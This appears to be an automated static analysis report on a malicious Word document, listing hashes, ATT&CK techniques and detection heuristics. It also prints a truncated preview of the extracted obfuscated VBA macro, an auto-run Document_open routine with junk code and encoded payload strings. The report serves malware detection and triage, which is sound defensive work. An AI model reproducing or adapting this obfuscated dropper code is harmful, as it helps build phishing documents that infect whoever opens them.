Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 fe37ceed0cfebd0d…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 179.0 KB
Created: 2018-04-18 18:52:00
Authoring application: Microsoft Office Word
First seen: 2019-08-04
MD5: b3a7d4c8e2a9713e59e090845e98d159
SHA-1: 233960894283a214717bf22240632278f4766edb
SHA-256: fe37ceed0cfebd0dc99fbfb3536ae7227bac632dc4436de66b58e32dcc168be7
Risk Score: 184

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1204.002 Malicious File
  • T1566.001 Spearphishing Attachment

The file contains VBA macros, including a Document_Open macro that uses the Shell() function to execute arbitrary code. The ClamAV detection 'Doc.Malware.Emodldr-10025032-0' and the presence of a suspicious 'macros.bas' artifact further indicate malicious intent. The VBA script appears to download and execute a second-stage payload, as evidenced by obfuscated strings that likely encode URLs or commands.

Heuristics (6)

  • ClamAV: Doc.Malware.Emodldr-10025032-0 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Emodldr-10025032-0
  • VBA macros detected [medium, 2 related findings] OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA [critical] OLE_VBA_SHELL
    Shell() call in VBA
  • Document_Open macro [high] OLE_VBA_DOCOPEN
    Document_Open macro
  • Suspicious extracted artifact [info] EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 46023 bytes
SHA-256: 1c3083047430461a2c05e6a6aa8a0809e8b586273af2e96b025d661f0bf0f9aa
Detection (ClamAV): No threats found
Obfuscation or payload: likely
Carved artifact contains 17 long base64-like blob(s).

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "bBAVUFGFJp"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
On Error Resume Next
rnfBp _
= ChrB(11 / Log(89434) / 57143 _
+ 7254)
WGRIsW = 33200 _
/ CBool(VAItm) / 74 + CSng(PwRoI) - _
(imsOk * UTfFL)
Application.Run GvtmNd + "EINaiskAWpCGdB" + IOWWSw, BTmtiG + KSXSdzQwaVm + tPjOC
iCzsP _
= ChrB(78081 / Log(63424) / 75251 _
+ 82824)
djnJz = 93106 _
/ CBool(PZQmM) / 74 + CSng(hlWFG) - _
(fJYKF * GQdHi)
End Sub


Attribute VB_Name = "LKBIKvzVw"
Sub TomlR(QGtja)
LIFYhI _
= ChrB(86471 / Log(61980) / 58392 _
+ 16287)
waCzYb = 51359 _
/ CBool(kQYpj) / 74 + CSng(TiFzX) - _
(uqkwt * lOodQ)
End Sub
Function KSXSdzQwaVm()
On Error Resume Next
FmNZud _
= ChrB(52002 / Log(66455) / 42378 _
+ 51364)
hKGGws = 41707 _
/ CBool(YiNVE) / 74 + CSng(abblsP) - _
(HAYTnu * cWJiQ)
wcRtZOj = dAzzm("V8LgA3AGEANABhADAANAA4AGQAZQAwAGQAZgAwAs0Qa", RqriCN - RqriCN + 4 + RqriCN - RqriCN, RqriCN - RqriCN + 35 + RqriCN - RqriCN)
UfJsr _
= ChrB(98926 / Log(95153) / 22224 _
+ 27831)
sRJjT = 3415 _
/ CBool(zdKtaJ) / 74 + CSng(nKwwsB) - _
(jEDWv * jtsSh)
jzumq _
= ChrB(88483 / Log(52290) / 95227 _
+ 896)
iwJnIb = 49431 _
/ CBool(TlBPcP) / 74 + CSng(NcGNz) - _
(wbOPk * TRVlzM)
KZtDSP = dAzzm("v6ADMAZABlADcAZQBjADQANQBkAGMAOQBkAGUAMwBmADEANwBjADMANAA0ADUAMgAxAGEANQAzADEAMQBhAGUANgBkAGQAMQAyADAAYQA5ADQAOQA1ADkAYQBhAGYAMwA5ADgAOAAwAGUAZgA2ADIANwAwADAAZABlADMAYwBlADAAMQBlAGMANAA4ADEAYQA2ADgAljo2LEJ", kjCdLF - kjCdLF + 3 + kjCdLF - kjCdLF, kjCdLF - kjCdLF + 196 + kjCdLF - kjCdLF)
wWqbC _
= ChrB(49432 / Log(14039) / 79344 _
+ 15077)
IUUiad = 33356 _
/ CBool(jAkhU) / 74 + CSng(XXiGhz) - _
(DCQToX * EnsKo)
ZQGzi _
= ChrB(35375 / Log(83943) / 5954 _
+ 33788)
Ownwu = 11318 _
/ CBool(KFhXo) / 74 + CSng(jEUWzK) - _
(mOimD * AHDVJO)
PoJjl = dAzzm("hIV,iMAAxAGUAZgBmADYAZgA3AGYAZABlAGMAYQBkAGEAZABhAGQANgA1AGIANAAxAGUANgA0ADcAZQAyADUAMABhAGQAMwBhADMAOAA4ADQAOAAwADzD", GvQRso - GvQRso + 6 + GvQRso - GvQRso, GvQRso - GvQRso + 110 + GvQRso - GvQRso)
fGlTbi _
= ChrB(54745 / Log(65021) / 9854 _
+ 19727)
qlfWu = 19295 _
/ CBool(rsOjAR) / 74 + CSng(vzFwH) - _
(XJCFcT * vViVh)
DQYaYl _
= ChrB(59372 / Log(99460) / 13767 _
+ 34561)
Trttr = 99791 _
/ CBool(kKbCPK) / 74 + CSng(WLwOpA) - _
(wTjYL * MnQLW)
XkDdFTHzX = dAzzm("uPSrxADAAOQBlADAAMwA5ADUAMgAxADIAZQA2ADcAOAA1AGIANwAyADQAYwA2AGMANwAxADkAYgBkAGEAMAA4AGQANQA1ADgAZQAwAGMANQAxADEAMgA0AGMANwBhADEAMwA4ADEAYQBmADgAMwAyAGEAZQBiADkAYQA3ADcAOABiADIAOAAw1", SvSPd - SvSPd + 5 + SvSPd - SvSPd, SvSPd - SvSPd + 176 + SvSPd - SvSPd)
sBVJBE _
= ChrB(94613 / Log(10740) / 58348 _
+ 45686)
ABNvB = 51515 _
/ CBool(kSRCXY) / 74 + CSng(UjoRw) - _
(PfnSdB * uKrvk)
TaoqOO _
= ChrB(6454 / Log(56339) / 47076 _
+ 74752)
cwwSoz = 76746 _
/ CBool(Sitdw) / 74 + CSng(aFcjQZ) - _
(dPUSLn * JduowJ)
bNFVjE = dAzzm("ltjr@5AGMANAA4ADIAZgBmAGIAMABjADUAMQA3ADYAZABmAGQAMwBkAGYAMABmADIAZQBkADAAOAA4ADYAOABkADkAZQA2ADAAZAA0AGIAMwA5AGYAYQBiAGQAZQBhAD3p5", zfXzP - zfXzP + 6 + zfXzP - zfXzP, zfXzP - zfXzP + 123 + zfXzP - zfXzP)
jBAbw _
= ChrB(93519 / Log(30561) / 1720 _
+ 23612)
zsrnIb = 94418 _
/ CBool(Nzwhb) / 74 + CSng(cJNtpo) - _
(jmsqE * EUcScD)
iEwJYw _
= ChrB(31441 / Log(68824) / 90653 _
+ 70626)
izuvPm = 7636 _
/ CBool(JkStw) / 74 + CSng(mihhXi) - _
(oIwjb * wsIZin)
LfazjzuZkB = dAzzm("%K7ADcAZAAxADcAZgAxADAANwAzAGEAYwBhADIAZABjADUANwBiAGEANgAyAGUANwAyAGEAOABhAGQANgA5AGIAYgBhADIAMABkADMAZgBmAGQAYQAyADEANQBiAGUAYwAwAGUAMAA0ADAAMABjADAAYgA2ATIQu", VSwnBB - VSwnBB + 4 + VSwnBB - VSwnBB, VSwnBB - VSwnBB + 153 + VSwnBB - VSwnBB)
SVkUtm _
= ChrB(38470 / Log(39820) / 90731 _
+ 12875)
KzhmN = 66788 _
/ CBool(XFTpp) / 74 + CSng(MnDFZB) - _
(kGDIQ * NolKzt)
ulEPi _
= ChrB(69553 / Log(97836) / 37453 _
+ 93868)
HSjaBf = 45656 _
/ CBool(znXwqh) / 74 + CSng(qUZBiw) - _
(qMjFKo * pnljMV)
PcpQjX = dAzzm("lGc,PAGMAZQBjADEANgA
... (truncated)